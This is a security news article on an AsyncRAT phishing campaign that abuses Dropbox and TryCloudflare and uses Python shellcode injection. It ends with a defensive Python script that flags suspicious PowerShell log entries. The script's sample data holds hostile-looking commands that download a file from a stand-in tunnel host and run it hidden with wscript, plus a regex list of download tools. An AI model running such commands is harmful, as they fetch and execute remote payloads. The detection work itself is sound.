AsyncRAT Campaign Leverages Cloud Services and Python for Stealthy Malware Delivery
A sophisticated phishing campaign is distributing the AsyncRAT malware by abusing trusted cloud services like Dropbox and TryCloudflare tunnels, employing a multi-stage process involving obfuscated scripts and Python for stealthy payload deployment.

A new wave of attacks is leveraging the AsyncRAT remote access trojan, employing a sophisticated delivery chain that abuses legitimate cloud infrastructure to evade security defenses. Threat actors are utilizing Dropbox links and TryCloudflare tunnels, services typically whitelisted by security solutions, to distribute malware that can spy on victims, steal data, and grant attackers remote control over infected systems.
Researchers from Forcepoint have identified this campaign, noting its similarity to previous attacks and its alignment with predictions about the increasing abuse of legitimate infrastructure by adversaries. The infection process begins with a phishing email containing a deceptive invoice theme and a Dropbox link. Upon clicking the link, victims download a ZIP file containing an internet shortcut (.LNK) file. This shortcut initiates a chain reaction, connecting to a TryCloudflare subdomain that hosts further malicious components.
The .LNK file, when executed, uses PowerShell to download a JavaScript file from the same tunnel. This JavaScript, after being deobfuscated, fetches a heavily obfuscated batch file. This batch file is the core of the initial infection stage; it simultaneously displays a fake PDF invoice to the victim as a decoy while downloading a second ZIP file. This second ZIP archive contains a Python package, which is crucial for deploying the final payload.
The Python package is designed to appear harmless, with most files serving as standard setup components. However, a single script named load.py, along with five accompanying binary files, executes the malicious actions. The load.py script leverages Python's ctypes library to interact directly with Windows system functions. This allows it to allocate memory, create threads, and inject shellcode into legitimate processes, a technique known as Early Bird APC queue injection.
This injection method plants malicious code into a newly created process before its main thread begins execution, significantly increasing the difficulty for antivirus and endpoint detection solutions to identify and block the threat. The specific payload deployed depends on which binary file is processed by load.py. Variants have been observed injecting VenomRAT into notepad.exe, XWorm into other processes, and AsyncRAT shellcode into legitimate system processes like explorer.exe.
All identified variants of the campaign communicate with command-and-control (C2) servers over various ports, indicating a coordinated effort to maintain access and control over compromised systems. Forcepoint notes that its customers have existing protections against several stages of this attack chain, including blocking malicious attachments, URLs, and C2 traffic.
For organizations and individuals not protected by such advanced security measures, vigilance against unexpected invoice emails and unsolicited ZIP or shortcut files remains paramount. Enabling PowerShell logging can also provide an early warning system for such infections. The continued reliance on legitimate cloud services and obfuscation techniques highlights a growing trend where attackers aim to blend in with normal network traffic, making detection increasingly challenging.
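As an added illustration of the "PowerShell logging as an early warning" point (example code written for this article, not Forcepoint's tooling or any indicator set they published), the following Python script scores PowerShell script block text for the traits described in the chain above: a download cradle pulling from a TryCloudflare or Dropbox URL, a hidden window, and a script host launching the fetched .js file. The sample log lines, the `example-words.trycloudflare.com` hostname and the file paths are constructed for the example; the indicator names and scoring rule are this example's own design, not a published signature.

```python
import re

# Constructed sample of PowerShell ScriptBlock log text (the kind of text that
# appears in Event ID 4104 once Script Block Logging is enabled). The hostname,
# paths and file names are made up for this example.
SAMPLE_SCRIPT_BLOCKS = [
    # benign admin activity
    "Get-ChildItem C:\\Users\\alice\\Documents | Where-Object { $_.Length -gt 1MB }",
    # suspicious: hidden window, download cradle to a TryCloudflare subdomain,
    # then the fetched .js is run with wscript
    "powershell -w hidden -c \"iwr https://example-words.trycloudflare.com/inv.js "
    "-o $env:TEMP\\inv.js; wscript $env:TEMP\\inv.js\"",
    # suspicious: Dropbox-hosted archive fetched via WebClient.DownloadFile
    "(New-Object Net.WebClient).DownloadFile("
    "'https://www.dropbox.com/scl/fi/EXAMPLE/invoice.zip?dl=1', \"$env:TEMP\\invoice.zip\")",
    # benign: module update from the gallery
    "Update-Module -Name Pester -Force",
]

# Indicator patterns (hypothetical names chosen for this example). Each maps a
# label to a regex evaluated case-insensitively against the script block text.
INDICATORS = {
    # cmdlets / .NET members commonly used to fetch remote content
    "DOWNLOAD_CRADLE": r"\b(iwr|invoke-webrequest|invoke-restmethod|curl|wget|"
                       r"downloadstring|downloadfile|start-bitstransfer)\b",
    # URL pointing at one of the legitimate services the campaign abuses
    "ABUSED_HOST": r"https?://[^\s'\"]*?\b(trycloudflare\.com|dropbox\.com)\b",
    # window hidden from the user (-w hidden / -WindowStyle hidden)
    "HIDDEN_WINDOW": r"-w(?:indowstyle)?\s+hidden\b",
    # Windows script host executing a script, as with the downloaded .js stage
    "SCRIPT_HOST_EXEC": r"\b(wscript|cscript)\b",
    # remote file with a scripting or archive extension
    "SCRIPT_OR_ARCHIVE_URL": r"https?://\S+?\.(js|vbs|bat|zip|lnk)\b",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


def analyze_script_block(text: str) -> dict:
    """Return the indicators matched in one script block and a verdict.

    The verdict is deliberately conservative: a download by itself is normal
    admin activity, so it is only flagged when paired with an abused host or
    with evasive execution traits (hidden window, script host launch).
    """
    hits = {name for name, rx in COMPILED.items() if rx.search(text)}
    cradle = "DOWNLOAD_CRADLE" in hits
    suspicious = cradle and (
        "ABUSED_HOST" in hits
        or "HIDDEN_WINDOW" in hits
        or "SCRIPT_HOST_EXEC" in hits
    )
    return {"indicators": sorted(hits), "suspicious": suspicious}


def scan(blocks: list[str]) -> list[tuple[int, list[str]]]:
    """Scan a list of script block texts; return (index, indicators) for flagged ones."""
    findings = []
    for idx, text in enumerate(blocks):
        result = analyze_script_block(text)
        if result["suspicious"]:
            findings.append((idx, result["indicators"]))
    return findings


if __name__ == "__main__":
    for idx, indicators in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {', '.join(indicators)}")
        print(f"  {SAMPLE_SCRIPT_BLOCKS[idx][:90]}")
```

In practice these lines come from the PowerShell Script Block Logging event log (Microsoft-Windows-PowerShell/Operational, Event ID 4104), which is the logging the article recommends enabling; the script only shows the triage logic that would sit behind it. TryCloudflare subdomains and Dropbox links also carry legitimate traffic, so the host indicator is a trigger for review rather than a block-on-sight rule, and the scoring should be tuned to what is normal for the environment.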